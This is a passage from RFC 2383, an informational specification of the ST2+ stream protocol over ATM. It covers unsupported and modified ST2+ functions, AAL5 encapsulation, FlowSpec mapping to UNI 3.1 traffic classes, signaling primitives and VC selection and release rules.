RFC 2383 ST2+ over ATM August 1998 or U10, the accept.req primitive is queued and is processed after the state changes to U0 or U10. If the state of the entity is U0 or U10, the ST2+ SCMP layer entity confirms whether or not the VC for the previous hop exists. If it does, an ACCEPT message is forwarded to the previous hop. If it does not and the CONNECT or CHANGE message that corresponds to the accept.req primitive specified a point-to-point SVC whose calling party is the upstream or a point-to-multipoint SVC, then the entity processes an incoming call that is shown in section 6.5.2. If the incoming call processing succeeds, an ACCEPT message is forwarded to the previous hop. If the CONNECT or CHANGE message that corresponds to the accept.req primitive specified a point-to-point SVC whose calling party is downstream, the entity converts from the IP address of the previous hop to the ATM address, and then the entity processes an outgoing call that is shown in section 6.5.1. If the outgoing call processing succeeds, an ACCEPT message is forwarded to the previous hop. For cases other than those described above or if the incoming or outgoing call processing fails, a REFUSE message is forwarded to the previous hop and a disconnect.ind primitive is sent to the routing machine. 6.6.6 Additional accept.ind processing rules When an ACCEPT message is processed in the ST2+ SCMP layer entity for the next hop, the entity confirms the state of the UNI 3.1 signaling layer entity. If the state of the entity is other than U0 or U10, the ACCEPT message is queued and is processed after the state changes to U0 or U10. If the state of the entity is U0 or U10, the ST2+ SCMP layer entity confirms whether or not the VC for the next hop exists. If it does, an accept.ind primitive is sent to the routing machine. If it does not and the CONNECT or CHANGE message that corresponds to the ACCEPT message specified a point-to-point SVC whose calling party is the upstream or a point-to-multipoint SVC, then the entity converts from the IP address of the next hop to the ATM address, and then the entity processes an outgoing call that is shown in section 6.5.1. If the outgoing call processing succeeds, an accept.ind primitive is sent to the routing machine. If the CONNECT or CHANGE message that corresponds to the ACCEPT message specified a point-to- point SVC whose calling party is downstream, the entity processes an incoming call that is shown in section 6.5.2. If the incoming call processing succeeds, an accept.ind primitive is sent to the routing machine. For cases other than those described above or if the incoming or outgoing call processing fails, a refuse.ind primitive is Suzuki Informational [Page 35]
RFC 2383 ST2+ over ATM August 1998 sent to the routing machine and a DISCONNECT message is forwarded to the next hop. 6.6.7 Additional disconnect.req processing rules At first, the ST2+ SCMP layer entity for the next hop forwards a DISCONNECT message to the next hop. And then, after the disconnect.req processing, if there are no more targets that are connected downstream of the entity and the entity is not waiting for an ACCEPT or REFUSE message response from targets, the entity releases the VC whose process is shown in section 6.5.3. 6.6.8 Additional disconnect.ind processing rules AT first, after the disconnect.ind processing, if there are no more targets that are connected downstream of the ST2+ SCMP layer entity for the previous hop and the entity is not waiting for an ACCEPT or REFUSE message response from targets, the entity releases the VC whose process is shown in section 6.5.3. And then, the entity sends a disconnect.ind primitive to the routing machine. 6.6.9 Additional refuse.req processing rules At first, the ST2+ SCMP layer entity for the previous hop forwards a REFUSE message to the previous hop. And then, after the refuse.req processing, if there are no more targets that are connected downstream of the entity and the entity is not waiting for an ACCEPT or REFUSE message response from targets, the entity releases the VC whose process is shown in section 6.5.3. 6.6.10 Additional refuse.ind processing rules At first, after the refuse.ind processing, if there are no more targets that are connected downstream of the ST2+ SCMP layer entity for the next hop and the entity is not waiting for an ACCEPT or REFUSE message response from targets, the entity releases the VC whose process is shown in section 6.5.3. And then, the entity sends a refuse.ind primitive to the routing machine. Suzuki Informational [Page 36]
RFC 2383 ST2+ over ATM August 1998 6.6.11 SVC disconnect processing When the ST2+ SCMP layer entity for the previous hop is sent a SVC disconnect processing from the UNI 3.1 signaling layer entity and then the SVC disconnect processing is completed, the entity forwards a REFUSE message to the previous hop and sends a disconnect.ind primitive to the routing machine. When the ST2+ SCMP layer entity for the next hop is sent a SVC disconnect processing from the UNI 3.1 signaling layer entity and then the SVC disconnect processing is completed, the entity sends a refuse.ind primitive to the routing machine and forwards a DISCONNECT message to the previous hop. 6.7 UNI 3.1 Signaling Information Element Coding Rules The ST2+ over ATM protocol does not specify the coding rules needed for the following information elements in UNI 3.1 signaling. The usages of these information elements are specified in [10]. o Protocol discriminator o Call reference o Message type o Message length o Call state o Called party number o Called party subaddress o Calling party number o Calling party subaddress o Cause o Connection identifier o Broadband repeat indicator o Restart indicator o Broadband sending complete Suzuki Informational [Page 37]
RFC 2383 ST2+ over ATM August 1998 o Transit network selection o Endpoint reference o Endpoint state 6.7.1 ATM adaptation layer parameters coding The SETUP and ADD PARTY messages in the ST2+ over ATM protocol must include an ATM adaptation layer parameters information element. The CONNECT message may or may not include this element. The coding rules for the fields are as follows. o The AAL Type is set to AAL5. o The value of the Forward maximum CPCS size field is set to the same as that of the MaxMsgSize field in the CONNECT SCMP message corresponding to the SETUP or ADD PARTY message. o If the VC is established as a point-to-point call, the value of the Backward maximum CPCS size field is set the same as that of the Forward maximum CPCS size field. If the VC is established as a point-to-multipoint call, the value of the Backward maximum CPCS size field is set to zero. o The SSCS type is set to null. 6.7.2 ATM traffic descriptor coding If the Null FlowSpec is specified in the ST2+ over ATM protocol, the coding rules for the fields in the ATM traffic descriptor information element in the SETUP message are as follows. o The value of the Forward PCR (CLP=0+1) field depends on the specification of the ATM network. The Forward PCR (CLP=0+1) field in each ATM interface in an implementation must be configurable to any value between zero and 16,777,215. o If the VC is established as a point-to-point call, the value of the Backward PCR (CLP=0+1) field is set the same as that of the Forward PCR (CLP=0+1) field. If the VC is established as a point-to- multipoint call, the value of the Backward PCR (CLP=0+1) field is set to zero. o The Best effort indication must be present. If the Controlled-Load Service FlowSpec is specified, the coding rules for the fields are as follows. Suzuki Informational [Page 38]
RFC 2383 ST2+ over ATM August 1998 o The value of the Forward PCR (CLP=0+1) field depends on the specification of the ATM network. The Forward PCR (CLP=0+1) field in each ATM interface in an implementation must be configurable to any value between zero and 16,777,215. o If the VC is established as a point-to-point call, the value of the Backward PCR (CLP=0+1) field is set the same as that of the Forward PCR (CLP=0+1) field. If the VC is established as a point-to- multipoint call, the value of the Backward PCR (CLP=0+1) field is set to zero. o The method for calculating the Forward SCR (CLP=0+1) field is shown in section 5. o If the VC is established as a point-to-point call, the value of the Backward SCR (CLP=0+1) field is set the same as that of the Forward SCR (CLP=0+1) field. If the VC is established as a point-to- multipoint call, this field must not be present. o The method for calculating the Forward MBS (CLP=0+1) field is shown in section 5. o If the VC is established as a point-to-point call, the value of the Backward MBS (CLP=0+1) field is set the same as that of the Forward MBS (CLP=0+1) field. If the VC is established as a point-to- multipoint call, this field must not be present. o The Best effort indication, Tagging backward, and Tagging forward fields must not be present. 6.7.3 Broadband bearer capability coding If the Null FlowSpec is specified in the ST2+ over ATM protocol, the coding rules for the fields in the Broadband bearer capability information element in the SETUP message are as follows. o The Bearer class depends on the specification of the ATM network. The Bearer class in each ATM interface in an implementation must be configurable as either BCOB-X or BCOB-C. BCOB-X is recommended as the default configuration. o The Traffic type and Timing requirements fields must not be present. o The Susceptibility to clipping field is set to not susceptible to clipping. Suzuki Informational [Page 39]
RFC 2383 ST2+ over ATM August 1998 o If the VC is established as a point-to-point call, the User plane connection configuration field is set to point-to-point, and if the VC is established as a point-to-multipoint call, it is set to point-to-multipoint. If the Controlled-Load Service FlowSpec is specified, the coding rules for the fields are as follows. o The Bearer class depends on the specification of the ATM network. The Bearer class in each ATM interface in an implementation must be configurable as either BCOB-X or BCOB-C. BCOB-X is recommended as the default configuration. o If the Bearer class is BCOB-X, the Traffic type and Timing requirements fields depend on the specification of the ATM network. The Traffic type and Timing requirements fields in each ATM interface in an implementation must be configurable as either no indication or VBR and Not required, respectively. No indication is recommended as the default configuration. If the Bearer class is BCOB-C, the Traffic type and Timing requirements fields must not be present. o The Susceptibility to clipping field depends on the specification of the ATM network. The Susceptibility to clipping field in each ATM interface in an implementation must be configurable as either not susceptible to clipping or susceptible to clipping. Not susceptible to clipping is recommended as the default configuration. o If the VC is established as a point-to-point call, the User plane connection configuration field is set to point-to-point, and if the VC is established as a point-to-multipoint call, it is set to point-to-multipoint. 6.7.4 Broadband high layer information coding The SETUP and ADD PARTY messages in the ST2+ over ATM protocol must include a Broadband high layer information information element. The coding rules for the fields are as follows. o The High layer information type is set to User specific. o The first 6 bytes in the High layer information field are set to the SID of the stream corresponding to the VC. Suzuki Informational [Page 40]
RFC 2383 ST2+ over ATM August 1998 6.7.5 Broadband low layer information coding The SETUP and ADD PARTY messages in the ST2+ over ATM protocol must include a Broadband low layer information information element. The CONNECT message may or may not include this element. The coding rules for the fields are as follows. o The User information layer 3 protocol field is set to ISO/IEC TR 9577 o The IPI field is set to IEEE 802.1 SNAP (0x80). o The OUI field is set to IANA (0x00-00-5E). o The PID field is set to ST2+ (TBD). 6.7.6 QoS parameter coding If the Null FlowSpec is specified in the ST2+ over ATM protocol, the coding rules for the fields in the QoS parameter in the SETUP message are as follows. o The QoS class forward and QoS class backward fields are set to QoS class 0. If the Controlled-Load Service FlowSpec is specified, the coding rules for the fields are as follows. o The QoS class forward and QoS class backward fields depend on the specification of the ATM network. The QoS class forward and QoS class backward fields in each ATM interface in an implementation must be configurable as either QoS class 0 or QoS class 3. QoS class 0 is recommended as the default configuration. 7. Security Considerations The ST2+ over ATM protocol modifies RFC 1819 ST2+ protocol, but basically these modifications are minimum extensions for ATM support and bug fixes, so they do not weaken the security of the ST2+ protocol. The ST2+ over ATM protocol specifies protocol interaction between ST2+ and UNI 3.1, and this does not weaken the security of the UNI 3.1 protocol. In an ST2+ agent that processes an incoming call of SVC, if the incoming SETUP message contains the calling party number and if it is verified and passed by the ATM network or it is provided by the Suzuki Informational [Page 41]
RFC 2383 ST2+ over ATM August 1998 network, then it is feasible to use the calling party number for part of the calling party authentication to strengthen security. References [1] Borden, M., Crawley, E., Davie, B., and S. Batsell, "Integration of Real-time Services in an IP-ATM Network Architecture", RFC 1821, August 1995. [2] Jackowski, S., "Native ATM Support for ST2+", RFC 1946, May 1996. [3] S. Damaskos and A. Gavras, "Connection Oriented Protocols over ATM: A case study", Proc. SPIE, Vol. 2188, pp.226-278, February 1994 [4] Delgrossi, L., and L. Berger, Ed., "Internet Stream Protocol Version 2 (ST2) Protocol Specification - Version ST2+", RFC 1819, August 1995. [5] Wroclawski, J., "Specification of the Controlled-Load Network Element Service", RFC 2211, September 1997. [6] Shenker, S., Partridge, C., and R. Guerin, "Specification of Guaranteed Quality of Service", RFC 2212, September 1997. [7] Wroclawski, J., "The Use of RSVP with IETF Integrated Services", RFC 2210, September 1997. [8] Garrett, M., and M. Borden, "Interoperation of Controlled-Load Service and Guaranteed Service with ATM", RFC 2381, August 1998. [9] Ghanwani, A., Pace, J., and V. Srinivasan, "A Framework for Providing Integrated Services Over Shared and Switched LAN Technologies", Work in Progress. [10] The ATM Forum, "ATM User-Network Interface Specification Version 3.1", September 1994. [11] The ATM Forum, "ATM User-Network Interface (UNI) Signaling Specification Version 4.0", af-sig-0061.000, July 1996. [12] ITU-T, "Broadband Integrated Services Digital Network (B-ISDN)- Digital Subscriber Signaling System No. 2 (DSS 2)-User-Network Interface (UNI) Layer 3 Specification for Basic Call/Connection Control", ITU-T Recommendation Q.2931, September 1995. Suzuki Informational [Page 42]
RFC 2383 ST2+ over ATM August 1998 [13] ITU-T, "Broadband Integrated Services Digital Network (B-ISDN)- Digital Subscriber Signaling System No. 2 (DSS 2)-User-Network Interface Layer 3 Specification for Point-to-Multipoint Call/Connection Control", ITU-T Recommendation Q.2971, October 1995 [14] ITU-T, "B-ISDN Protocol Reference Model and its Application", CCITT Recommendation I.321, April 1991. [15] ITU-T, "B-ISDN ATM Adaptation Layer (AAL) type 5 specification", Draft new ITU-T Recommendation I.363.5, September 1995. [16] Heinanen, J., "Multiprotocol Encapsulation over ATM Adaptation Layer 5", RFC 1483, July 1993. [17] Laubach, M., "Classical IP and ARP over ATM", RFC 1577, January 1994 [18] Perez, M., Liaw, F., Mankin, A., Hoffman, E., Grossman, D., and A. Malis, "ATM Signaling Support for IP over ATM", RFC 1755, February 1995. [19] Luciani, J., Katz, D., Piscitello, D., and B. Cole, "NBMA Next Hop Resolution Protocol (NHRP)", RFC 2332, April 1998. Suzuki Informational [Page 43]
RFC 2383 ST2+ over ATM August 1998 Acknowledgments ATM is a huge technology and without the help of many colleagues at NTT who are involved in ATM research and development, it would have been impossible for me to complete this protocol specification. I would like to thank Hideaki Arai and Naotaka Morita of the NTT Network Strategy Planning Dept., Shin-ichi Kuribayashi, Jun Aramomi, and Takumi Ohba of the NTT Network Service Systems Labs., and also Hisao Uose and Yoshikazu Oda of the NTT Multimedia Networks Labs. for their valuable comments and discussions. And I would also like to especially thank Eric Crawley of Gigapacket Networks, John Wroclawski of MIT, Steven Jackowski of Net Manage, Louis Berger of FORE Systems, Steven Willis of Bay Networks, Greg Burch of Qosnetics, and Denis Gallant, James Watt, and Joel Halpern of Newbridge Networks for their valuable comments and suggestions. Also this specification is based on various discussions during NTT Multimedia Joint Project with NACSIS. I would like to thank Professor Shoichiro Asano of the National Center for Science Information Systems for his invaluable advice in this area. Author's Address Muneyoshi Suzuki NTT Multimedia Networks Laboratories 3-9-11, Midori-cho Musashino-shi, Tokyo 180-8585, Japan Phone: +81-422-59-2119 Fax: +81-422-59-2829 EMail: [email protected] Suzuki Informational [Page 44]
RFC 2383 ST2+ over ATM August 1998 Appendix A. RFC 1819 ST2+ Errata A.1 4.3 SCMP Reliability The following sentence in the second paragraph: < For some SCMP messages (CONNECT, CHANGE, JOIN, and STATUS) the should be changed to > For some SCMP messages (CONNECT, CHANGE, and JOIN) the A.2 4.4.4 User Data The following sentence: < option can be included with ACCEPT, CHANGE, CONNECT, DISCONNECT, and < REFUSE messages. The format of the UserData parameter is shown in should be changed to > option can be included with ACCEPT, CHANGE, CONNECT, DISCONNECT, NOTIFY, > and REFUSE messages. The format of the UserData parameter is shown in A.3 5.3.2 Other Cases The following sentence: < CONNECT with a REFUSE message with the affected targets specified in < the TargetList and an appropriate ReasonCode (StreamExists). should be changed to > CONNECT with a REFUSE message with the affected targets specified in > the TargetList and an appropriate ReasonCode (TargetExists). A.4 5.5.1 Mismatched FlowSpecs The following sentence: < notifies the processing ST agent which should respond with ReasonCode < (FlowSpecMismatch). should be changed to > notifies the processing ST agent which should respond with a REFUSE > message with ReasonCode (FlowSpecMismatch). Suzuki Informational [Page 45]
RFC 2383 ST2+ over ATM August 1998 A.5 6.2.1 Problems in Stream Recovery The following sentence: < some time after a failure. As a result, the ST agent attempting the < recovery may receive ERROR messages for the new CONNECTs that are < ... < failure, and will interpret the new CONNECT as resulting from a < routing failure. It will respond with an ERROR message with the < appropriate ReasonCode (StreamExists). Since the timeout that the ST < ... < remnants of the broken stream will soon be torn down by a DISCONNECT < message. Therefore, the ST agent that receives the ERROR message with < ReasonCode (StreamExists) should retransmit the CONNECT message after should be changed to > some time after a failure. As a result, the ST agent attempting the > recovery may receive REFUSE messages for the new CONNECTs that are > ... > failure, and will interpret the new CONNECT as resulting from a > routing failure. It will respond with a REFUSE message with the > appropriate ReasonCode (TargetExists). Since the timeout that the ST > ... > remnants of the broken stream will soon be torn down by a DISCONNECT > message. Therefore, the ST agent that receives the REFUSE message with > ReasonCode (TargetExists) should retransmit the CONNECT message after A.6 6.3 Stream Preemption} The following sentence: < (least important) to 256 (most important). This value is should be changed to > (least important) to 255 (most important). This value is A.7 10.2 Control PDUs The following sentence: <o Reference is a transaction number. Each sender of a request control < message assigns a Reference number to the message that is unique < with respect to the stream. should be changed to Suzuki Informational [Page 46]
RFC 2383 ST2+ over ATM August 1998 >o Reference is a transaction number. Each sender of a request control > message assigns a Reference number to the message that is unique > with respect to the stream for messages generated by each agent. A.8 10.3.4 Origin The following: < +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ < | PCode = 5 | PBytes | NextPcol |OriginSAPBytes | < +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ should be changed to > +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ > | PCode = 4 | PBytes | NextPcol |OriginSAPBytes | > +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ A.9 10.4.1 ACCEPT The following sentence: <o IPHops is the number of IP encapsulated hops traversed by the < stream. This field is set to zero by the origin, and is incremented < at each IP encapsulating agent. should be changed to >o IPHops is the number of IP encapsulated hops traversed by the > stream. A.10 10.4.2 ACK The following: < +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ < | OpCode = 2 | 0 | TotalBytes | < +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ should be changed to > +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ > | OpCode = 2 | 0 | TotalBytes = 16 | > +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Suzuki Informational [Page 47]
RFC 2383 ST2+ over ATM August 1998 A.11 10.4.3 CHANGE The following sentence: <o I (bit 7) is used to indicate that the LRM is permitted to interrupt should be changed to >o I (bit 9) is used to indicate that the LRM is permitted to interrupt A.12 10.4.7 HELLO The following: < +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ < | OpCode = 7 |R| 0 | TotalBytes | < +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ should be changed to > +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ > | OpCode = 7 |R| 0 | TotalBytes = 20 | > +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ A.13 10.4.9 JOIN-REJECT The following sentence: <o Reference contains a number assigned by the ST agent sending the < REFUSE for use in the acknowledging ACK. should be changed to >o Reference contains a number assigned by the ST agent sending the > JOIN-REJECT for use in the acknowledging ACK. A.14 10.4.13 STATUS-RESPONSE The following sentence: < possibly Groups of the stream. It the full target list can not fit in should be changed to > possibly Groups of the stream. If the full target list can not fit in Suzuki Informational [Page 48]
RFC 2383 ST2+ over ATM August 1998 A.15 10.5.3 ReasonCode The following: < 32 PCodeUnknown Control PDU has a parameter with an invalid < PCode. should be removed because a common SCMP element with an unknown PCode is equivalent to the UserData (RFC 1819, Section 10.3.8). Suzuki Informational [Page 49]
RFC 2383 ST2+ over ATM August 1998 Full Copyright Statement Copyright (C) The Internet Society (1998). All Rights Reserved. This document and translations of it may be copied and furnished to others, and derivative works that comment on or otherwise explain it or assist in its implementation may be prepared, copied, published and distributed, in whole or in part, without restriction of any kind, provided that the above copyright notice and this paragraph are included on all such copies and derivative works. However, this document itself may not be modified in any way, such as by removing the copyright notice or references to the Internet Society or other Internet organizations, except as needed for the purpose of developing Internet standards in which case the procedures for copyrights defined in the Internet Standards process must be followed, or as required to translate it into languages other than English. The limited permissions granted above are perpetual and will not be revoked by the Internet Society or its successors or assigns. This document and the information contained herein is provided on an "AS IS" basis and THE INTERNET SOCIETY AND THE INTERNET ENGINEERING TASK FORCE DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION HEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. Suzuki Informational [Page 50]
Back to RFC index
|
__label__pos
| 0.686249 |
Take the 2-minute tour ×
Mathematics Stack Exchange is a question and answer site for people studying math at any level and professionals in related fields. It's 100% free, no registration required.
I've been trying to come up with a simple algebraic extension $F(\alpha)$ over a field $F$ that has $[F(\alpha):F]$ not divisible by 3, but has $F(\alpha^3)$ properly contained in $F(\alpha)$. I haven't had any luck - maybe I'm thinking incorrectly, but all I can think of is cube roots, fourth roots and the like.
share|improve this question
What about $\mathbb{R}(i)$? – Michael Albanese Dec 21 '12 at 23:48
@MichaelAlbanese, I'm looking for proper containment. $\mathbb{R}(i^3)=\mathbb{R}(i)$. – Frank White Dec 21 '12 at 23:50
Sorry, I missed the word 'properly'. – Michael Albanese Dec 21 '12 at 23:52
3
Although this does not help if $E$ is not supposed to be $F$ in one spot and $F(\alpha)$ in another, an example might be $\mathbb Q(\omega)$ where $\omega=\mathrm{exp}(2\pi i/3)$, since $\omega^2+\omega+1=0$. – peoplepower Dec 21 '12 at 23:52
1
@Frank: Sorry, not to nitpick, but the standard notation for the degree of an extension $L/K$ is $[L:K]$, i.e. the larger field is on the left. Now that I think I understand what you're asking, I'll edit. – Zev Chonoles Dec 22 '12 at 0:15
show 5 more comments
1 Answer
Consider the extension $\mathbb Q(\omega)/\mathbb Q$ with $\omega=e^{2\pi i/3}$, and note that $\omega$ is a root of the polynomial $x^3-1=(x-1)(x^2+x+1)$. Since $\omega$ is distinct from $1$, it must satisfy $p(x)=x^2+x+1$. Finally, $p(x+1)=x^2+3x+3$ is irreducible over $\mathbb{Q}$ by Eisenstein's Criterion.
Therefore the extension is a degree 2, simple extension generated by a cube root of an element of the base field.
share|improve this answer
Looks OK to me, +1 – Belgi Dec 22 '12 at 14:04
add comment
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.554676 |
DEV Community
Cover image for Learn MongoDB + Python basics in 5 minutes !
Siddhesh Shankar
Siddhesh Shankar
Posted on
Learn MongoDB + Python basics in 5 minutes !
What is MongoDB?
MongoDB is a NoSQL database – a NoSQL database is one where you don’t query the database with SQL. Other than that NoSQL really means nothing to define a database. So let’s have another go at defining MongoDB. MongoDB is a JSON document datastore. It allows you to store and query JSON style documents with a few smarts on top. This means that you can store objects with nested data all in one collection (collections are like tables for MongoDB).
What is MongoDB Compass?
MongoDB Compass is the GUI for MongoDB. Compass allows you to analyze and understand the contents of your data without formal knowledge of MongoDB query syntax. Click here to download and watch this video to install compass.
Let's Code
• Install pymongo. Just open the command prompt and type:
pip install pymongo
Enter fullscreen mode Exit fullscreen mode
• Open Jupyter Notebook. Let's create a database first.
DEFAULT_CONNECTION_URL = "mongodb://localhost:27017/"
database_name = "Indian_States_DB"
# Establish a connection with mongodb
client = pymongo.MongoClient(DEFAULT_CONNECTION_URL)
## Creating a Database
database = client[database_name]
Enter fullscreen mode Exit fullscreen mode
• Create a collection. Collection in NoSQL can also be called a table. We have created a empty table below.
# Creating a collection
COLLECTION_NAME = 'Gross_Domestic_Product'
# Adding the collection to our database
collection = database[COLLECTION_NAME]
Enter fullscreen mode Exit fullscreen mode
• Let's check if our database exists or not.
client.list_database_names()
> ['admin', 'config', 'crawlerDB', 'demoDB', 'local']
Enter fullscreen mode Exit fullscreen mode
The database name does not appear in the above list because there is not data inside Gross_Domestic_Product.
Inserting Records
# Inserting one record
record = {
"Rank": "1",
"State": "Maharastra",
"Nominal GDP ($ Billion)": "400",
"Data Year": "2019-2020",
"Comparable Country": "Philippines"
}
collection.insert_one(record)
Enter fullscreen mode Exit fullscreen mode
# Inserting multiple records
records = [{
"Rank": "2",
"State": "Tamil Nadu",
"Nominal GDP ($ Billion)": "260",
"Data Year": "2019-2020",
"Comparable Country": "Vietnam"
},
{
"Rank": "3",
"State": "Uttar Pradesh",
"Nominal GDP ($ Billion)": "250",
"Data Year": "2019-2020",
"Comparable Country": "Romania"
},
{
"Rank": "4",
"State": "Karnataka",
"Nominal GDP ($ Billion)": "240",
"Data Year": "2019-2020",
"Comparable Country": "Portugal"
}]
collection.insert_many(records)
Enter fullscreen mode Exit fullscreen mode
• Again check if the database exists or not.
client.list_database_names()
> ['Indian_States_DB', 'admin', 'config', 'crawlerDB', 'demoDB', 'local']
Enter fullscreen mode Exit fullscreen mode
Find Records
• The find() method returns all occurrences in the selection. Select rank and states from the collection.
for i in collection.find({},{"_id":0, "Rank":1, "State":1}):
print(i)
{'Rank': '1', 'State': 'Maharastra'}
{'Rank': '2', 'State': 'Tamil Nadu'}
{'Rank': '3', 'State': 'Uttar Pradesh'}
{'Rank': '4', 'State': 'Karnataka'}
Enter fullscreen mode Exit fullscreen mode
You are not allowed to specify both 0 and 1 values in the same object (except if one of the fields is the _id field). If you specify a field with the value 0, all other fields get the value 1, and vice versa. For selecting all the records, simply execute find().
Sort
• Use the sort() method to sort the result in ascending or descending order. Use the value -1 as the second parameter to sort descending.
for i in collection.find({},{"_id":0,"State":1, "Nominal GDP ($ Billion)":1}).sort("State", -1):
print(i)
{'State': 'Uttar Pradesh', 'Nominal GDP ($ Billion)': '250'}
{'State': 'Tamil Nadu', 'Nominal GDP ($ Billion)': '260'}
{'State': 'Maharastra', 'Nominal GDP ($ Billion)': '400'}
{'State': 'Karnataka', 'Nominal GDP ($ Billion)': '240'}
Enter fullscreen mode Exit fullscreen mode
Limit the Result
• To limit the result in MongoDB, we use the limit() method.
for i in collection.find({},{"_id":0, "Rank":1, "State":1, "Comparable Country":1}).limit(2):
print(i)
{'Rank': '1', 'State': 'Maharastra', 'Comparable Country': 'Philippines'}
{'Rank': '2', 'State': 'Tamil Nadu', 'Comparable Country': 'Vietnam'}
Enter fullscreen mode Exit fullscreen mode
Delete Records
To delete one document, we use the delete_one() method. To delete more than one document, use the delete_many() method.
collection.delete_one({"State": "Maharastra"})
for i in collection.find():
print(i)
{'_id': ObjectId('5f8ae0347d1ce4be5cea8007'), 'Rank': '2', 'State': 'Tamil Nadu', 'Nominal GDP ($ Billion)': '260', 'Data Year': '2019-2020', 'Comparable Country': 'Vietnam'}
{'_id': ObjectId('5f8ae0347d1ce4be5cea8008'), 'Rank': '3', 'State': 'Uttar Pradesh', 'Nominal GDP ($ Billion)': '250', 'Data Year': '2019-2020', 'Comparable Country': 'Romania'}
{'_id': ObjectId('5f8ae0347d1ce4be5cea8009'), 'Rank': '4', 'State': 'Karnataka', 'Nominal GDP ($ Billion)': '240', 'Data Year': '2019-2020', 'Comparable Country': 'Portugal'}
Enter fullscreen mode Exit fullscreen mode
This was all about basics of MongoDB. Hope you like my explanation. Furthermore, if you have any query, feel free to ask in a comment section.
Discussion (0)
|
__label__pos
| 0.508865 |
How Do You Create a Pivot Table in Excel?
How Do You Create a Pivot Table in Excel?
To create a PivotTable in Excel 2010, click Insert at the top of the worksheet, and select the PivotTable icon on the left. To properly generate a PivotTable, you must first organize your data and then design the layout.
1. Organize the data set
Organize your data into columns with headings, and make sure there are no empty rows or columns. This layout is required to create a PivotTable in Excel 2010. After organizing your worksheet, click on any cell within the set, and proceed to insert the PivotTable. Excel then automatically determines your table's range, although you can alter it by entering a different cell range. After affirming the range, choose whether you want your table to appear on a new or existing worksheet, and click OK.
2. Drag fields
After clicking OK, Excel creates an empty PivotTable report in your specified location. Organize your PivotTable through the field list on the right. Select a field by clicking Check Box, and either drag or right-click the selection into the desired layout field. Adjust the results so that the data is presented in a clear and concise manner. To change how the data is calculated or presented, click the drop-down menus within the value field.
3. Apply finishing touches
After organizing your pivot table, click the Design and Options tabs under the PivotTable Tools menu. Explore the options provided under each tab. Select the table’s headings to apply filters for sorting purposes or to rename the fields. Continue to make adjustments until your data is presented in the desired manner.
|
__label__pos
| 0.999846 |
Vikas Kumar Vikas Kumar - 9 months ago 32
CSS Question
What is the difference between applying CSS transition property in hover rather than in its normal state?
I'm learning CSS3. Now, what I've seen in w3schools website is that:
CSS
#ID{
transition: transform 3s;
}
#ID:hover{
transform: rotateX(20deg);
}
And what I did is this:
CSS:
#ID:hover{
transform: rotateX(20deg);
transition: transform 3s;
}
Both are working. So, the question is: Can I put both transition and any transformation property in same selector? Or is it not the right way?
Answer
SHORT ANSWER:
If you define your transition property in element:hover, it will only get applied in that state.
EXPLANATION:
Whichever CSS properties you define in element:hover will only be applied when the element is in the hover state, whereas whichever CSS properties you define in your element will be applied in both states.
Transition property declared in normal state:
See how the transition always runs when the element's state is changed. When you stop hovering the element it will still make the transition back to its normal state.
CODE SNIPPET:
#ID {
width: 100px;
height: 100px;
margin: 0 auto;
background-color: royalblue;
transition: transform 1s;
}
#ID:hover {
transform: rotateX(60deg);
}
<div id="ID"></div>
Transition property declared in hovered state:
See how the transition breaks when you stop hovering the element and it jumps to its normal state immediately.
CODE SNIPPET:
#ID {
width: 100px;
height: 100px;
margin: 0 auto;
background-color: royalblue;
}
#ID:hover {
transition: transform 1s;
transform: rotateX(60deg);
}
<div id="ID"></div>
|
__label__pos
| 0.999981 |
Dynamic Memory Allocation in C with Example
Dynamic memory allocation refers to the manual memory management in the C language.
Need of Manual Memory Management/ Dynamic Memory Allocation :
• In case of array, the programmer must declare the size of the array during compile time (the time when a compiler compiles code written in a programming language into executable form).
• But consider a situation in which the programmer do not have any idea about the length/size of the array to define.
• In that case the size of the array he declared the size either insufficient or more than he required.
• In the first case, the compiler stops the program due to insufficient space and in the latter case, there is a wastage of space.
• Since the exact size of array is unknown, the programmer needs dynamic memory allocation.
A brief description on Memory layout of C programs
C facilitate dynamic memory allocation. Let us understand how C organizes memory for its programs. After compiling a program, creates distinct regions of memory that are used for different distinct specific functions. These regions are :
1. Program code segment/region
2. Data segment/region
1. Initialised data or data segment
2. Uninitialised data or .bss segment
3. Stack region
4. Heap region
Dynamic Memory Allocation
Regions :
Program Code Region :
This region in the memory holds the combined code of the program. The program’s every instruction and the program’s every function starts at a particular address.
Data Segment :
Data segment stores program data and it could be in any form like initialised or uninitialised variable, local or global variables. Data segment is further divided into
1. Initialised data or data segment : It stores all initialised :
• Global variables( including Global static variables)
• Static local variables
• Constant
• External variables
2. Uninitialised data or .bss segment : It stores all uninitialised :
• Global variable
• Static variable
• External variable
